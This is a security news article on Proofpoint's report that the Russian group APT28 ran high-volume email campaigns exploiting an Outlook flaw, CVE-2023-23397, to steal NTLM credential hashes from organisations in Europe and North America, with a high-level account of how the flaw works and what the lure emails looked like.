A threat group associated with the Russian military intelligence service was behind several mass attack campaigns that exploited known flaws in Outlook and WinRAR to collect Windows NTLM credential hashes from organizations in Europe and North America. The high volume of emails is unusual for cyberespionage groups, which are typically highly targeted in their victim selection.
“Proofpoint observed a significant deviation from expected volumes of emails sent in campaigns exploiting CVE-2023-23397 — a Microsoft Outlook elevation of privilege vulnerability,” researchers from security firm Proofpoint said in a report. “This included over 10,000 emails sent from the adversary, from a single email provider, to defense, aerospace, technology, government, and manufacturing entities, and, occasionally, included smaller volumes at higher education, construction, and consulting entities.”
The CVE-2023-23397 vulnerability was patched by Microsoft in March after APT28, also known as Fancy Bear, exploited it for almost a year as a zero-day exploit in attacks against organizations from the government, military and energy sectors. The attacks managed to fly under the radar because of their highly targeted nature.
The vulnerability is described as an elevation of privilege flaw but can be exploited without user interaction to trick the Microsoft Outlook desktop client to initiate an SMB connection to a remote attacker-controlled server. Since SMB is a file-sharing protocol for Windows networks, the callbacks include an NTLM authentication attempt where the user’s hashed NTLM credentials are being sent to the attacker’s server.
The theft of NTLM hashes enables a type of attack called NTLM relay or pass-the-hash, where an attacker tricks a computer to send its hash and then passes it to another legitimate service that would accept that authentication.
According to Proofpoint, after Microsoft patched the vulnerability in March, APT28 continued to use it in attacks and even ramped up the scale of its campaigns. The malicious emails had a subject of “Test meeting” and contained a specially crafted file in the Transport Neutral Encapsulation Format (TNEF) with a fake CSV, Excel, or Word document extension.